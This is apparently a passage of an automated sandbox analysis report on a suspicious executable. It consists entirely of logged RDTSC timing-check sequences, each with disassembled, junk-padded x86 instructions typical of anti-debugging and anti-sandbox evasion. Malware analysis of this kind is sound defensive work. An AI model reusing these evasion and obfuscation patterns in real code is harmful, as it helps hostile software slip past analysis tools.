Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF0577 second address: EF05AD instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAF7914BED1h 0x00000008 jmp 00007FAF7914BECBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 clc 0x00000013 mov esi, dword ptr [ebp+122D29ADh] 0x00000019 push 00000000h 0x0000001b mov si, D8E6h 0x0000001f mov dword ptr [ebp+122D2465h], edx 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jbe 00007FAF7914BEC8h 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF05AD second address: EF05D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF78D3F52Ch 0x00000008 jnc 00007FAF78D3F526h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 ja 00007FAF78D3F526h 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF05D0 second address: EF05DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FAF7914BEC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF05DA second address: EF05DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF1B58 second address: EF1B72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF1B72 second address: EF1BF1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FAF78D3F52Eh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FAF78D3F528h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 clc 0x00000029 mov dword ptr [ebp+122D2F1Ah], eax 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FAF78D3F528h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b mov di, 8A55h 0x0000004f jng 00007FAF78D3F528h 0x00000055 mov edi, edx 0x00000057 mov di, BBF0h 0x0000005b push 00000000h 0x0000005d mov esi, dword ptr [ebp+122D3568h] 0x00000063 xchg eax, ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 push esi 0x00000067 push eax 0x00000068 pop eax 0x00000069 pop esi 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF1BF1 second address: EF1C09 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAF7914BECBh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF1C09 second address: EF1C0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF328F second address: EF3293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF3293 second address: EF3299 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF3299 second address: EF32A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FAF7914BEC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF6DEF second address: EF6DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF6DF3 second address: EF6DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF6DF7 second address: EF6E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 jns 00007FAF78D3F53Ch 0x0000000e jnp 00007FAF78D3F536h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FAF78D3F528h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 add bx, A305h 0x00000037 push eax 0x00000038 push ecx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c pop eax 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF6E49 second address: EF6E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF7E04 second address: EF7E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c ja 00007FAF78D3F526h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF6FAE second address: EF7039 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAF7914BEC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d clc 0x0000000e push dword ptr fs:[00000000h] 0x00000015 call 00007FAF7914BED3h 0x0000001a jno 00007FAF7914BEDEh 0x00000020 pop ebx 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push edx 0x00000029 sbb ebx, 4D259897h 0x0000002f pop ebx 0x00000030 mov ebx, dword ptr [ebp+122D29CDh] 0x00000036 mov eax, dword ptr [ebp+122D0F0Dh] 0x0000003c push FFFFFFFFh 0x0000003e sub dword ptr [ebp+122D24C0h], ebx 0x00000044 nop 0x00000045 jmp 00007FAF7914BECFh 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jnp 00007FAF7914BECCh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF7039 second address: EF704B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF78D3F52Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF9B99 second address: EF9C36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FAF7914BEC8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 movsx edi, ax 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FAF7914BEC8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D2370h], ecx 0x0000004b push 00000000h 0x0000004d mov ebx, 7F28D7A1h 0x00000052 sbb edi, 74828020h 0x00000058 xchg eax, esi 0x00000059 jnl 00007FAF7914BEDDh 0x0000005f push esi 0x00000060 jmp 00007FAF7914BED5h 0x00000065 pop esi 0x00000066 push eax 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF9C36 second address: EF9C40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF9C40 second address: EF9C44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF8E1D second address: EF8E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF8E21 second address: EF8E25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF8E25 second address: EF8E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFAB97 second address: EFAB9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFBBE8 second address: EFBBEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFBBEC second address: EFBBFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FAF7914BEC6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFAE63 second address: EFAE6D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF78D3F52Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFBD13 second address: EFBD2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7914BED7h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFBD2F second address: EFBD4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF78D3F538h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F00857 second address: F00861 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F029AE second address: F029C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 js 00007FAF78D3F528h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007FAF78D3F528h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFEB18 second address: EFEB22 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAF7914BEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F029C7 second address: F029D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FAF78D3F526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFEB22 second address: EFEB27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F029D1 second address: F02A13 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAF78D3F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007FAF78D3F539h 0x00000012 push 00000000h 0x00000014 sub dword ptr [ebp+12481856h], ebx 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+1247ABA3h], esi 0x00000022 xor bx, 6A62h 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFEB27 second address: EFEB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F02A13 second address: F02A19 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F00A86 second address: F00A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FAF7914BED1h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F02A19 second address: F02A36 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF78D3F533h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F02A36 second address: F02A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F01B7A second address: F01B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F01B7E second address: F01B84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F05ACE second address: F05AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F09004 second address: F09011 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAF7914BEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1068E second address: F106A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAF78D3F532h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0FD33 second address: F0FD39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0FD39 second address: F0FD3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0FD3E second address: F0FD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0FD44 second address: F0FD59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAF78D3F52Ch 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F10185 second address: F1018F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF7914BECEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1018F second address: F1019D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FAF78D3F526h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1019D second address: F101A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F159C6 second address: F159CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1AC31 second address: F1AC35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1AC35 second address: F1AC4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F530h 0x00000007 jc 00007FAF78D3F526h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1AC4F second address: F1AC54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1A11E second address: F1A12A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FAF78D3F526h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1A12A second address: F1A12E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1A52F second address: F1A559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF78D3F52Eh 0x00000009 pop ecx 0x0000000a push edi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edi 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007FAF78D3F52Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1A559 second address: F1A563 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAF7914BECCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1A563 second address: F1A56A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1A819 second address: F1A821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1A821 second address: F1A825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F206BF second address: F206DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FAF7914BEC6h 0x0000000a pop edx 0x0000000b jmp 00007FAF7914BECAh 0x00000010 jng 00007FAF7914BECEh 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1FA30 second address: F1FA3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FAF78D3F526h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1FA3B second address: F1FA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAF7914BED4h 0x0000000b popad 0x0000000c push edx 0x0000000d jnc 00007FAF7914BEC6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1FA5F second address: F1FA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jnp 00007FAF78D3F53Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 jg 00007FAF78D3F526h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1FA76 second address: F1FA7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1FBFD second address: F1FC01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9C3B second address: EA9C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9C41 second address: EA9C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAF78D3F52Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9C55 second address: EA9C59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9C59 second address: EA9C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF78D3F52Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9C6D second address: EA9C72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9C72 second address: EA9C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9C78 second address: EA9C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2D7F4 second address: F2D7F9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF4ED0 second address: EF4EDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF4EDA second address: EF4F3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F537h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jg 00007FAF78D3F52Eh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FAF78D3F528h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c or dword ptr [ebp+122D23EDh], esi 0x00000032 lea eax, dword ptr [ebp+12489C53h] 0x00000038 add di, 7672h 0x0000003d and di, 6AD8h 0x00000042 nop 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF4F3F second address: EF4F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF4F43 second address: EF4F5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FAF78D3F52Dh 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF4F5F second address: EF4F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF5037 second address: EF503B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF503B second address: EF5055 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAF7914BECDh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF5055 second address: EF5152 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAF78D3F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007FAF78D3F533h 0x00000010 jmp 00007FAF78D3F52Dh 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 push ecx 0x00000018 jmp 00007FAF78D3F534h 0x0000001d pop edx 0x0000001e push dword ptr fs:[00000000h] 0x00000025 sub dword ptr [ebp+122D2D77h], ebx 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 jmp 00007FAF78D3F52Ch 0x00000037 mov dword ptr [ebp+12489CABh], esp 0x0000003d jmp 00007FAF78D3F52Fh 0x00000042 cmp dword ptr [ebp+122D298Dh], 00000000h 0x00000049 jne 00007FAF78D3F629h 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007FAF78D3F528h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 0000001Bh 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 push eax 0x0000006a mov edi, 7032F900h 0x0000006f pop ecx 0x00000070 mov byte ptr [ebp+122D2414h], 00000047h 0x00000077 jp 00007FAF78D3F52Bh 0x0000007d sub di, E5ECh 0x00000082 mov eax, D49AA7D2h 0x00000087 call 00007FAF78D3F52Ah 0x0000008c pop edx 0x0000008d nop 0x0000008e jc 00007FAF78D3F53Eh 0x00000094 jmp 00007FAF78D3F538h 0x00000099 push eax 0x0000009a push eax 0x0000009b push edx 0x0000009c push eax 0x0000009d push edx 